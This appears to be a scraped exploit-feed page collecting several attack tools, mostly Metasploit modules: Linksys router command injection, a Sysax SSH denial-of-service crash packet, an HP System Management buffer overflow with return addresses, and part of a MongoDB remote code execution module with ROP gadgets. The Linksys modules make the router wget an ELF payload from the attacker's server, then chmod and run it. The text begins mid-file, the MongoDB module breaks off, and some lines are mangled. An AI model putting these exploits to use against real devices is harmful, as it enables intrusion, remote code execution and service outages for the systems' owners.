"<INPUT\ maxLength=3\ onBlur=valid_range\\(this\,0\,255\,\"DNS\"\\)\ size=3\ value=\'(.*)\' name=\"wan_dns1_1\"\ class=num\>") @wan_dns1_2_orig = get_config(res.body, "<INPUT\ maxLength=3\ onBlur=valid_range\\(this\,0\,255\,\"DNS\"\\)\ size=3\ value=\'(.*)\'\ name=\"wan_dns1_2\"\ class=num\>") @wan_dns1_3_orig = get_config(res.body, "<INPUT\ maxLength=3\ onBlur=valid_range\\(this\,0\,254\,\"DNS\"\\)\ size=3\ value=\'(.*)\'\ name=\"wan_dns1_3\"\ class=num\>") @wan_dns2_0_orig = get_config(res.body, "<INPUT\ maxLength=3\ onBlur=valid_range\\(this\,0\,223\,\"DNS\"\\)\ size=3\ value=\'(.*)\'\ name=\"wan_dns2_0\"\ class=num\>") @wan_dns2_1_orig = get_config(res.body, "<INPUT\ maxLength=3\ onBlur=valid_range\\(this\,0\,255\,\"DNS\"\\)\ size=3\ value=\'(.*)\' name=\"wan_dns2_1\"\ class=num\>") @wan_dns2_2_orig = get_config(res.body, "<INPUT\ maxLength=3\ onBlur=valid_range\\(this\,0\,255\,\"DNS\"\\)\ size=3\ value=\'(.*)\'\ name=\"wan_dns2_2\"\ class=num\>") @wan_dns2_3_orig = get_config(res.body, "<INPUT\ maxLength=3\ onBlur=valid_range\\(this\,0\,254\,\"DNS\"\\)\ size=3\ value=\'(.*)\'\ name=\"wan_dns2_3\"\ class=num\>") @wan_wins_orig = get_config(res.body, "<input\ type=hidden\ name=wan_wins\ value=(.*)><INPUT\ maxLength=3") @wan_wins_0_orig = get_config(res.body, "<INPUT\ maxLength=3\ onBlur=valid_range\\(this\,0\,223\,\"WINS\"\\)\ size=3\ value=\'(.*)\'\ name=\"wan_wins_0\"\ class=num>") @wan_wins_1_orig = get_config(res.body, "<INPUT\ maxLength=3\ onBlur=valid_range\\(this\,0\,255\,\"WINS\"\\)\ size=3\ value=\'(.*)\'\ name=\"wan_wins_1\"\ class=num>") @wan_wins_2_orig = get_config(res.body, "<INPUT\ maxLength=3\ onBlur=valid_range\\(this\,0\,255\,\"WINS\"\\)\ size=3\ value=\'(.*)\'\ name=\"wan_wins_2\"\ class=num>") @wan_wins_3_orig = get_config(res.body, "<INPUT\ maxLength=3\ onBlur=valid_range\\(this\,0\,254\,\"WINS\"\\)\ size=3\ value=\'(.*)\'\ name=\"wan_wins_3\"\ class=num>") end def restore_conf(user,pass,uri) # we have used most parts of the original configuration # just need to restore wan_hostname cmd = @wan_hostname_orig.to_s print_status("#{rhost}:#{rport} - Asking the Linksys device to reload original configuration") res = request(cmd,user,pass,uri) if (!res) fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to reload original configuration") end #the device needs around 10 seconds to apply our current configuration print_status("#{rhost}:#{rport} - Waiting #{@timeout} seconds for reloading the configuration") select(nil, nil, nil, @timeout) end def request(cmd,user,pass,uri) begin res = send_request_cgi({ 'uri' => uri, 'method' => 'POST', 'authorization' => basic_auth(user,pass), 'encode_params' => false, 'vars_post' => { 'submit_button' => "index", 'change_action' => "1", 'submit_type' => "1", 'action' => "Apply", 'now_proto' => @now_proto_orig.to_s, 'daylight_time' => @daylight_time_orig.to_s, 'lan_ipaddr' => @lan_ipaddr_orig.to_s, 'wait_time' => @wait_time_orig.to_s, 'need_reboot' => @need_reboot_orig.to_s, 'ui_language' => @ui_language_orig, 'wan_proto' => @wan_proto_orig.to_s, 'router_name' => @router_name_orig.to_s, 'wan_hostname' => cmd, 'wan_domain' => @wan_domain_orig.to_s, 'mtu_enable' => @mtu_enable.to_s, 'wan_mtu' => @wan_mtu_orig.to_s, 'lan_ipaddr_0' => @lan_ipaddr_0_orig.to_s, 'lan_ipaddr_1' => @lan_ipaddr_1_orig.to_s, 'lan_ipaddr_2' => @lan_ipaddr_2_orig.to_s, 'lan_ipaddr_3' => @lan_ipaddr_3_orig.to_s, 'lan_netmask' => "255.255.255.#{@netmask_orig}", 'lan_proto' => @lan_proto_orig.to_s, 'dhcp_check' => "1", 'dhcp_start' => @dhcp_start_orig.to_s, 'dhcp_num' => @dhcp_num_orig.to_s, 'dhcp_lease' => @dhcp_lease_orig.to_s, 'wan_dns' => @wan_dns_orig.to_s, 'wan_dns0_0' => @wan_dns0_0_orig.to_s, 'wan_dns0_1' => @wan_dns0_1_orig.to_s, 'wan_dns0_2' => @wan_dns0_2_orig.to_s, 'wan_dns0_3' => @wan_dns0_3_orig.to_s, 'wan_dns1_0' => @wan_dns1_0_orig.to_s, 'wan_dns1_1' => @wan_dns1_1_orig.to_s, 'wan_dns1_2' => @wan_dns1_2_orig.to_s, 'wan_dns1_3' => @wan_dns1_3_orig.to_s, 'wan_dns2_0' => @wan_dns2_0_orig.to_s, 'wan_dns2_1' => @wan_dns2_1_orig.to_s, 'wan_dns2_2' => @wan_dns2_2_orig.to_s, 'wan_dns2_3' => @wan_dns2_3_orig.to_s, 'wan_wins' => @wan_wins_orig.to_s, 'wan_wins_0' => @wan_wins_0_orig.to_s, 'wan_wins_1' => @wan_wins_1_orig.to_s, 'wan_wins_2' => @wan_wins_2_orig.to_s, 'wan_wins_3' => @wan_wins_3_orig.to_s, 'time_zone' => "-08+1+1", #default is ok '_daylight_time' => '1' #default is ok } }) return res rescue ::Rex::ConnectionError vprint_error("#{rhost} - Failed to connect to the web server") return nil end end def exploit downfile = datastore['DOWNFILE'] || rand_text_alpha(8+rand(8)) uri = '/apply.cgi' user = datastore['USERNAME'] pass = datastore['PASSWORD'] rhost = datastore['RHOST'] rport = datastore['RPORT'] restore = datastore['RESTORE_CONF'] @timeout = 10 # # testing Login # print_status("#{rhost}:#{rport} - Trying to login with #{user} / #{pass}") begin res = send_request_cgi({ 'uri' => uri, 'method' => 'GET', 'authorization' => basic_auth(user,pass) }) if res.nil? or res.code == 404 fail_with(Exploit::Failure::NoAccess, "#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}") end if 200, 301,.include?(res.code) print_good("#{rhost}:#{rport} - Successful login #{user}/#{pass}") else fail_with(Exploit::Failure::NoAccess, "#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}") end rescue ::Rex::ConnectionError fail_with(Exploit::Failure::Unreachable, "#{rhost}:#{rport} - Failed to connect to the web server") end grab_config(user,pass) if target.name =~ /CMD/ if not (datastore['CMD']) fail_with(Exploit::Failure::BadConfig, "#{rhost}:#{rport} - Only the cmd/generic payload is compatible") end cmd = payload.encoded cmd = "`#{cmd}`" res = request(cmd,user,pass,uri) if (!res) fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload") else print_status("#{rhost}:#{rport} - Blind Exploitation - unknown Exploitation state") end print_status("#{rhost}:#{rport} - Waiting #{@timeout} seconds for reloading the configuration") select(nil, nil, nil, @timeout) restore_conf(user,pass,uri) if restore return end #thx to Juan for his awesome work on the mipsel elf support @pl = generate_payload_exe @elf_sent = false # # start our server # resource_uri = '/' + downfile if (datastore['DOWNHOST']) service_url = 'http://' + datastore['DOWNHOST'] + ':' + datastore['SRVPORT'].to_s + resource_uri else #do not use SSL if datastore['SSL'] ssl_restore = true datastore['SSL'] = false end #we use SRVHOST as download IP for the coming wget command. #SRVHOST needs a real IP address of our download host if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::") srv_host = Rex::Socket.source_address(rhost) else srv_host = datastore['SRVHOST'] end service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri print_status("#{rhost}:#{rport} - Starting up our web service on #{service_url} ...") start_service({'Uri' => { 'Proc' => Proc.new { |cli, req| on_request_uri(cli, req) }, 'Path' => resource_uri }}) datastore['SSL'] = true if ssl_restore end # # download payload # print_status("#{rhost}:#{rport} - Asking the Linksys device to download #{service_url}") #this filename is used to store the payload on the device filename = rand_text_alpha_lower(8) #not working if we send all command together -> lets take three requests cmd = "/usr/bin/wget #{service_url} -O /tmp/#{filename}" cmd = "`#{cmd}`" res = request(cmd,user,pass,uri) if (!res) fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload") end # wait for payload download if (datastore['DOWNHOST']) #waiting some time so we could be sure that the device got the payload from our third party server print_status("#{rhost}:#{rport} - Giving #{datastore['HTTP_DELAY']} seconds to the Linksys device to download the payload") select(nil, nil, nil, datastore['HTTP_DELAY']) else wait_linux_payload end register_file_for_cleanup("/tmp/#{filename}") # # chmod # cmd = "chmod 777 /tmp/#{filename}" cmd = "`#{cmd}`" print_status("#{rhost}:#{rport} - Asking the Linksys device to chmod #{downfile}") res = request(cmd,user,pass,uri) if (!res) fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload") end print_status("#{rhost}:#{rport} - Waiting #{@timeout} seconds for reloading the configuration") select(nil, nil, nil, @timeout) # # execute # cmd = "/tmp/#{filename}" cmd = "`#{cmd}`" print_status("#{rhost}:#{rport} - Asking the Linksys device to execute #{downfile}") res = request(cmd,user,pass,uri) if (!res) fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload") end print_status("#{rhost}:#{rport} - Waiting #{@timeout} seconds for reloading the configuration") select(nil, nil, nil, @timeout) # #reload original configuration # if restore restore_conf(user,pass,uri) end end # Handle incoming requests from the server def on_request_uri(cli, request) #print_status("on_request_uri called: #{request.inspect}") if (not @pl) print_error("#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!") return end print_status("#{rhost}:#{rport} - Sending the payload to the server...") @elf_sent = true send_response(cli, @pl) end # wait for the data to be sent def wait_linux_payload print_status("#{rhost}:#{rport} - Waiting for the victim to request the ELF payload...") waited = 0 while (not @elf_sent) select(nil, nil, nil, 1) waited += 1 if (waited > datastore['HTTP_DELAY']) fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Target didn't request request the ELF payload -- Maybe it cant connect back to us?") end end end

==> Sysax Multi Server 6.10 - SSH DoS Exploit

http://rss.feedsportal.com/c/32479/f/477548/index.rss #!/usr/bin/env ruby # Sysax Multi Server 6.10 SSH DoS # Matt "hostess" Andreko < mandreko [at] accuvant.com > # http://www.mattandreko.com/2013/04/sysax-multi-server-610-ssh-dos.html require 'socket' unless ARGV.length == 2 puts "Usage: ruby #{$0} [host] [port]\n" exit end packet = [0x00, 0x00, 0x03, 0x14, 0x08, 0x14, 0xff, 0x9f, 0xde, 0x5d, 0x5f, 0xb3, 0x07, 0x8f, 0x49, 0xa7, 0x79, 0x6a, 0x03, 0x3d, 0xaf, 0x55, 0x00, 0x00, 0x00, 0x7e, 0x64, 0x69, 0x66, 0x66, 0x69, 0x65, 0x2d, 0x68, 0x65, 0x6c, 0x6c, 0x6d, 0x61, 0x6e, 0x2d, 0x67, 0x72, 0x6f, 0x75, 0x70, 0x2d, 0x65, 0x78, 0x63, 0x68, 0x61, 0x6e, 0x67, 0x65, 0x2d, 0x73, 0x68, 0x61, 0x32, 0x35, 0x36, 0x2c, 0x64, 0x69, 0x66, 0x66, 0x69, 0x65, 0x2d, 0x68, 0x65, 0x6c, 0x6c, 0x6d, 0x61, 0x6e, 0x2d, 0x67, 0x72, 0x6f, 0x75, 0x70, 0x2d, 0x65, 0x78, 0x63, 0x68, 0x61, 0x6e, 0x67, 0x65, 0x2d, 0x73, 0x68, 0x61, 0x31, 0x2c, 0x64, 0x69, 0x66, 0x66, 0x69, 0x65, 0x2d, 0x68, 0x65, 0x6c, 0x6c, 0x6d, 0x61, 0x6e, 0x2d, 0x67, 0x72, 0x6f, 0x75, 0x70, 0x31, 0x34, 0x2d, 0x73, 0x68, 0x61, 0x31, 0x2c, 0x64, 0x69, 0x66, 0x66, 0x69, 0x65, 0x2d, 0x68, 0x65, 0x6c, 0x6c, 0x6d, 0x61, 0x6e, 0x2d, 0x67, 0x72, 0x6f, 0x75, 0x70, 0x31, 0x2d, 0x73, 0x68, 0x61, 0x31, 0x00, 0x00, 0x00, 0x0f, 0x73, 0x73, 0x68, 0x2d, 0x72, 0x73, 0x61, 0x2c, 0x73, 0x73, 0x68, 0x2d, 0x64, 0x73, 0x73, 0x00, 0x00, 0x00, 0x9d, 0x61, 0x65, 0x73, 0x31, 0x32, 0x38, 0x2d, 0x63, 0x62, 0x63, 0x2c, 0x33, 0x64, 0x65, 0x73, 0x2d, 0x63, 0x62, 0x63, 0x2c, 0x62, 0x6c, 0x6f, 0x77, 0x66, 0x69, 0x73, 0x68, 0x2d, 0x63, 0x62, 0x63, 0x2c, 0x63, 0x61, 0x73, 0x74, 0x31, 0x32, 0x38, 0x2d, 0x63, 0x62, 0x63, 0x2c, 0x61, 0x72, 0x63, 0x66, 0x6f, 0x75, 0x72, 0x31, 0x32, 0x38, 0x2c, 0x61, 0x72, 0x63, 0x66, 0x6f, 0x75, 0x72, 0x32, 0x35, 0x36, 0x2c, 0x61, 0x72, 0x63, 0x66, 0x6f, 0x75, 0x72, 0x2c, 0x61, 0x65, 0x73, 0x31, 0x39, 0x32, 0x2d, 0x63, 0x62, 0x63, 0x2c, 0x61, 0x65, 0x73, 0x32, 0x35, 0x36, 0x2d, 0x63, 0x62, 0x63, 0x2c, 0x72, 0x69, 0x6a, 0x6e, 0x64, 0x61, 0x65, 0x6c, 0x2d, 0x63, 0x62, 0x63, 0x40, 0x6c, 0x79, 0x73, 0x61, 0x74, 0x6f, 0x72, 0x2e, 0x6c, 0x69, 0x75, 0x2e, 0x73, 0x65, 0x2c, 0x61, 0x65, 0x73, 0x31, 0x32, 0x38, 0x2d, 0x63, 0x74, 0x72, 0x2c, 0x61, 0x65, 0x73, 0x31, 0x39, 0x32, 0x2d, 0x63, 0x74, 0x72, 0x2c, 0x61, 0x65, 0x73, 0x32, 0x35, 0x36, 0x2d, 0x63, 0x74, 0x72, 0x00, 0x00, 0x00, 0x9d, 0x61, 0x65, 0x73, 0x31, 0x32, 0x38, 0x2d, 0x63, 0x62, 0x63, 0x2c, 0x33, 0x64, 0x65, 0x73, 0x2d, 0x63, 0x62, 0x63, 0x2c, 0x62, 0x6c, 0x6f, 0x77, 0x66, 0x69, 0x73, 0x68, 0x2d, 0x63, 0x62, 0x63, 0x2c, 0x63, 0x61, 0x73, 0x74, 0x31, 0x32, 0x38, 0x2d, 0x63, 0x62, 0x63, 0x2c, 0x61, 0x72, 0x63, 0x66, 0x6f, 0x75, 0x72, 0x31, 0x32, 0x38, 0x2c, 0x61, 0x72, 0x63, 0x66, 0x6f, 0x75, 0x72, 0x32, 0x35, 0x36, 0x2c, 0x61, 0x72, 0x63, 0x66, 0x6f, 0x75, 0x72, 0x2c, 0x61, 0x65, 0x73, 0x31, 0x39, 0x32, 0x2d, 0x63, 0x62, 0x63, 0x2c, 0x61, 0x65, 0x73, 0x32, 0x35, 0x36, 0x2d, 0x63, 0x62, 0x63, 0x2c, 0x72, 0x69, 0x6a, 0x6e, 0x64, 0x61, 0x65, 0x6c, 0x2d, 0x63, 0x62, 0x63, 0x40, 0x6c, 0x79, 0x73, 0x61, 0x74, 0x6f, 0x72, 0x2e, 0x6c, 0x69, 0x75, 0x2e, 0x73, 0x65, 0x2c, 0x61, 0x65, 0x73, 0x31, 0x32, 0x38, 0x2d, 0x63, 0x74, 0x72, 0x2c, 0x61, 0x65, 0x73, 0x31, 0x39, 0x32, 0x2d, 0x63, 0x74, 0x72, 0x2c, 0x61, 0x65, 0x73, 0x32, 0x35, 0x36, 0x2d, 0x63, 0x74, 0x72, 0x00, 0x00, 0x00, 0x69, 0x68, 0x6d, 0x61, 0x63, 0x2d, 0x6d, 0x64, 0x35, 0x2c, 0x68, 0x6d, 0x61, 0x63, 0x2d, 0x73, 0x68, 0x61, 0x31, 0x2c, 0x75, 0x6d, 0x61, 0x63, 0x2d, 0x36, 0x34, 0x40, 0x6f, 0x70, 0x65, 0x6e, 0x73, 0x73, 0x68, 0x2e, 0x63, 0x6f, 0x6d, 0x2c, 0x68, 0x6d, 0x61, 0x63, 0x2d, 0x72, 0x69, 0x70, 0x65, 0x6d, 0x64, 0x31, 0x36, 0x30, 0x2c, 0x68, 0x6d, 0x61, 0x63, 0x2d, 0x72, 0x69, 0x70, 0x65, 0x6d, 0x64, 0x31, 0x36, 0x30, 0x40, 0x6f, 0x70, 0x65, 0x6e, 0x73, 0x73, 0x68, 0x2e, 0x63, 0x6f, 0x6d, 0x2c, 0x68, 0x6d, 0x61, 0x63, 0x2d, 0x73, 0x68, 0x61, 0x31, 0x2d, 0x39, 0x36, 0x2c, 0x68, 0x6d, 0x61, 0x63, 0x2d, 0x6d, 0x64, 0x35, 0x2d, 0x39, 0x36, 0x00, 0x00, 0x00, 0x69, 0x68, 0x6d, 0x61, 0x63, 0x2d, 0x6d, 0x64, 0x35, 0x2c, 0x68, 0x6d, 0x61, 0x63, 0x2d, 0x73, 0x68, 0x61, 0x31, 0x2c, 0x75, 0x6d, 0x61, 0x63, 0x2d, 0x36, 0x34, 0x40, 0x6f, 0x70, 0x65, 0x6e, 0x73, 0x73, 0x68, 0x2e, 0x63, 0x6f, 0x6d, 0x2c, 0x68, 0x6d, 0x61, 0x63, 0x2d, 0x72, 0x69, 0x70, 0x65, 0x6d, 0x64, 0x31, 0x36, 0x30, 0x2c, 0x68, 0x6d, 0x61, 0x63, 0x2d, 0x72, 0x69, 0x70, 0x65, 0x6d, 0x64, 0x31, 0x36, 0x30, 0x40, 0x6f, 0x70, 0x65, 0x6e, 0x73, 0x73, 0x68, 0x2e, 0x63, 0x6f, 0x6d, 0x2c, 0x68, 0x6d, 0x61, 0x63, 0x2d, 0x73, 0x68, 0x61, 0x31, 0x2d, 0x39, 0x36, 0x2c, 0x68, 0x6d, 0x61, 0x63, 0x2d, 0x6d, 0x64, 0x35, 0x2d, 0x39, 0x36, 0x00, #3rd byte in this next line causes crash 0x00, 0x00, 0x28, 0x7a, 0x6c, 0x69, 0x62, 0x40, 0x6f, 0x70, 0x65, 0x6e, 0x73, 0x73, 0x68, 0x2e, 0x63, 0x6f, 0x6d, 0x2c, 0x7a, 0x6c, 0x69, 0x62, 0x2c, 0x6e, 0x6f, 0x6e, 0x65, 0x00, 0x00, 0x00, 0x1a, 0x7a, 0x6c, 0x69, 0x62, 0x40, 0x6f, 0x70, 0x65, 0x6e, 0x73, 0x73, 0x68, 0x2e, 0x63, 0x6f, 0x6d, 0x2c, 0x7a, 0x6c, 0x69, 0x62, 0x2c, 0x6e, 0x6f, 0x6e, 0x65, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00].pack("C*") host = ARGV[0] port = ARGV[1] sock = TCPSocket.open(host, port) banner = sock.gets() puts banner sock.puts("SSH-2.0-OpenSSH_5.1p1 Debian-5ubuntu1\r\n") sock.puts(packet) resp = sock.gets()

==> HP System Management Anonymous Access Code Execution Exploit

http://rss.feedsportal.com/c/32479/f/477548/index.rss ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking HttpFingerprint = { :pattern => [ /HP System Management Homepage/ ] } include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'HP System Management Anonymous Access Code Execution', 'Description' => %q{ This module exploits an anonymous remote code execution on HP System Management 7.1.1 and earlier. The vulnerability exists when handling the iprange parameter on a request against /proxy/DataValidation. In order to work HP System Management must be configured with Anonymous access enabled. }, 'Author' => [ 'agix' ], # @agixid 'License' => MSF_LICENSE, 'Payload' => { 'DisableNops' => true, 'Space' => 1000, 'BadChars' => "\x00\x25\x0a\x0b\x0d\x3a\x3b\x09\x0c\x23\x20", 'EncoderOptions' => { 'BufferRegister' => 'ESP' # See the comments below } }, 'Platform' => ['linux'], 'Arch' => ARCH_X86, 'References' => [ ['OSVDB', '91812'] ], 'Targets' => [ [ 'HP System Management 7.1.1 - Linux (CentOS)', { 'Ret' => 0x8054e14, # push esp / ret 'Offset' => 267 } ], [ 'HP System Management 6.3.0 - Linux (CentOS)', { 'Ret' => 0x805a547, # push esp / ret 'Offset' => 267 } ] ], 'DisclosureDate' => 'Sep 01 2012', 'DefaultTarget' => 0)) register_options( [ Opt::RPORT(2381), OptBool.new('SSL', true, 'Use SSL',) ], self.class) end def check res = send_request_cgi({ 'method' => 'GET', 'uri' => "/cpqlogin.htm" }) if res and res.code == 200 and res.body =~ /"HP System Management Homepage v(.*)"/ version = $1 return Exploit::CheckCode::Vulnerable if version <= "7.1.1.1" end return Exploit::CheckCode::Safe end def exploit padding = rand_text_alpha(target['Offset']) ret = [target['Ret']].pack('V') iprange = "a-bz"+padding+ret+payload.encoded print_status("#{rhost}:#{rport} - Sending exploit...") res = send_request_cgi({ 'method' => 'GET', 'uri' => "/proxy/DataValidation", 'encode_params' => false, 'vars_get' => { 'iprange' => iprange } }) end

==> Linksys E1500/E2500 apply.cgi Remote Command Injection Exploit

http://rss.feedsportal.com/c/32479/f/477548/index.rss ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer include Msf::Exploit::EXE include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'Linksys E1500/E2500 apply.cgi Remote Command Injection', 'Description' => %q{ Some Linksys Routers are vulnerable to an authenticated OS command injection. Default credentials for the web interface are admin/admin or admin/password. Since it is a blind os command injection vulnerability, there is no output for the executed command when using the cmd generic payload. A ping command against a controlled system could be used for testing purposes. }, 'Author' => [ 'Michael Messner <devnull@s3cur1ty.de>', # Vulnerability discovery and Metasploit module 'juan vazquez' # minor help with msf module ], 'License' => MSF_LICENSE, 'References' => [ [ 'BID', '57760' ], [ 'EDB', '24475' ], [ 'OSVDB', '89912' ], [ 'URL', 'http://www.s3cur1ty.de/m1adv2013-004' ] ], 'DisclosureDate' => 'Feb 05 2013', 'Privileged' => true, 'Platform' => ['linux','unix'], 'Payload' => { 'DisableNops' => true }, 'Targets' => [ [ 'CMD', { 'Arch' => ARCH_CMD, 'Platform' => 'unix' } ], [ 'Linux mipsel Payload', { 'Arch' => ARCH_MIPSLE, 'Platform' => 'linux' } ], ], 'DefaultTarget' => 1, )) register_options( [ OptString.new('USERNAME', [ true, 'The username to authenticate as', 'admin' ]), OptString.new('PASSWORD', [ true, 'The password for the specified username', 'admin' ]), OptAddress.new('DOWNHOST', [ false, 'An alternative host to request the MIPS payload from' ]), OptString.new('DOWNFILE', [ false, 'Filename to download, (default: random)' ]), OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the ELF payload request', 60]) ], self.class) end def request(cmd,user,pass,uri) begin res = send_request_cgi({ 'uri' => uri, 'method' => 'POST', 'authorization' => basic_auth(user,pass), 'vars_post' => { "submit_button" => "Diagnostics", "change_action" => "gozila_cgi", "submit_type" => "start_ping", "action" => "", "commit" => "0", "ping_ip" => "1.1.1.1", "ping_size" => "&#{cmd}&", "ping_times" => "5", "traceroute_ip" => "" } }) return res rescue ::Rex::ConnectionError vprint_error("#{rhost}:#{rport} - Failed to connect to the web server") return nil end end def exploit downfile = datastore['DOWNFILE'] || rand_text_alpha(8+rand(8)) uri = '/apply.cgi' user = datastore['USERNAME'] pass = datastore['PASSWORD'] rhost = datastore['RHOST'] rport = datastore['RPORT'] # # testing Login # print_status("#{rhost}:#{rport} - Trying to login with #{user} / #{pass}") begin res = send_request_cgi({ 'uri' => uri, 'method' => 'GET', 'authorization' => basic_auth(user,pass) }) if res.nil? or res.code == 404 fail_with(Exploit::Failure::NoAccess, "#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}") end if 200, 301,.include?(res.code) print_good("#{rhost}:#{rport} - Successful login #{user}/#{pass}") else fail_with(Exploit::Failure::NoAccess, "#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}") end rescue ::Rex::ConnectionError fail_with(Exploit::Failure::Unreachable, "#{rhost}:#{rport} - Failed to connect to the web server") end if target.name =~ /CMD/ if not (datastore['CMD']) fail_with(Exploit::Failure::BadConfig, "#{rhost}:#{rport} - Only the cmd/generic payload is compatible") end cmd = payload.encoded res = request(cmd,user,pass,uri) if (!res) fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload") else print_status("#{rhost}:#{rport} - Blind Exploitation - unknown Exploitation state") end return end #thx to Juan for his awesome work on the mipsel elf support @pl = generate_payload_exe @elf_sent = false # # start our server # resource_uri = '/' + downfile if (datastore['DOWNHOST']) service_url = 'http://' + datastore['DOWNHOST'] + ':' + datastore['SRVPORT'].to_s + resource_uri else #do not use SSL if datastore['SSL'] ssl_restore = true datastore['SSL'] = false end #we use SRVHOST as download IP for the coming wget command. #SRVHOST needs a real IP address of our download host if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::") srv_host = Rex::Socket.source_address(rhost) else srv_host = datastore['SRVHOST'] end service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri print_status("#{rhost}:#{rport} - Starting up our web service on #{service_url} ...") start_service({'Uri' => { 'Proc' => Proc.new { |cli, req| on_request_uri(cli, req) }, 'Path' => resource_uri }}) datastore['SSL'] = true if ssl_restore end # # download payload # print_status("#{rhost}:#{rport} - Asking the Linksys device to download #{service_url}") #this filename is used to store the payload on the device filename = rand_text_alpha_lower(8) #not working if we send all command together -> lets take three requests cmd = "/usr/bin/wget #{service_url} -O /tmp/#{filename}" res = request(cmd,user,pass,uri) if (!res) fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload") end # wait for payload download if (datastore['DOWNHOST']) print_status("#{rhost}:#{rport} - Giving #{datastore['HTTP_DELAY']} seconds to the Linksys device to download the payload") select(nil, nil, nil, datastore['HTTP_DELAY']) else wait_linux_payload end register_file_for_cleanup("/tmp/#{filename}") # # chmod # cmd = "chmod 777 /tmp/#{filename}" print_status("#{rhost}:#{rport} - Asking the Linksys device to chmod #{downfile}") res = request(cmd,user,pass,uri) if (!res) fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload") end # # execute # cmd = "/tmp/#{filename}" print_status("#{rhost}:#{rport} - Asking the Linksys device to execute #{downfile}") res = request(cmd,user,pass,uri) if (!res) fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload") end end # Handle incoming requests from the server def on_request_uri(cli, request) #print_status("on_request_uri called: #{request.inspect}") if (not @pl) print_error("#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!") return end print_status("#{rhost}:#{rport} - Sending the payload to the server...") @elf_sent = true send_response(cli, @pl) end # wait for the data to be sent def wait_linux_payload print_status("#{rhost}:#{rport} - Waiting for the victim to request the ELF payload...") waited = 0 while (not @elf_sent) select(nil, nil, nil, 1) waited += 1 if (waited > datastore['HTTP_DELAY']) fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Target didn't request request the ELF payload -- Maybe it cant connect back to us?") end end end

==> MongoDB nativeHelper.apply Remote Code Execution

http://rss.feedsportal.com/c/32479/f/477548/index.rss ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp def initialize(info={}) super(update_info(info, 'Name' => 'MongoDB nativeHelper.apply Remote Code Execution', 'Description' => %q{ This module exploit a the nativeHelper feature from spiderMonkey which allows to to control execution by calling it wit specially crafted arguments. This module has been tested successfully on MongoDB 2.2.3 on Ubuntu 10.04 and Debian Squeeze. }, 'Author' => [ 'agix' # @agixid # Vulnerability discovery and Metasploit module ], 'References' => [ [ 'CVE', '2013-1892' ], [ 'OSVDB', '91632' ], [ 'BID', '58695' ], [ 'URL', 'http://blog.scrt.ch/2013/03/24/mongodb-0-day-ssji-to-rce/' ] ], 'Platform' => 'linux', 'Targets' => [ [ 'Linux - mongod 2.2.3 - 32bits', { 'Arch' => ARCH_X86, 'mmap' => [ 0x0816f768, # mmap64@plt # from mongod 0x08666d07, # add esp, 0x14 / pop ebx / pop ebp / ret # from mongod 0x31337000, 0x00002000, 0x00000007, 0x00000031, 0xffffffff, 0x00000000, 0x00000000, 0x0816e4c8, # memcpy@plt # from mongod 0x31337000, 0x31337000, 0x0c0b0000, 0x00002000 ], 'ret' => 0x08055a70, # ret # from mongod 'gadget1' => 0x0836e204, # mov eax,DWORD PTR [eax] / call DWORD PTR [eax+0x1c] # These gadgets need to be composed with bytes < 0x80 'gadget2' => 0x08457158, # xchg esp,eax / add esp,0x4 / pop ebx / pop ebp / ret <== this gadget must xchg esp,eax and then increment ESP 'gadget3' => 0x08351826, # add esp,0x20 / pop esi / pop edi / pop ebp <== this gadget placed before gadget2 increment ESP to escape gadget2 'gadget4' => 0x08055a6c, # pop eax / ret 'gadget5' => 0x08457158 # xchg esp,eax } ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Mar 24 2013', 'License' => MSF_LICENSE )) register_options( [ Opt::RPORT(27017), OptString.new('DB', [ true, "Database to use", "admin"]), OptString.new('COLLECTION', [ false, "Collection to use (it must to exist). Better to let empty", ""]), OptString.new('USERNAME', [ false, "Login to use", ""]), OptString.new('PASSWORD', [ false, "Password to use", ""]) ], self.class) end def exploit begin connect if require_auth? print_status("Mongo server #{datastore['RHOST']} use authentication...") if !datastore['USERNAME'] || !datastore['PASSWORD'] disconnect 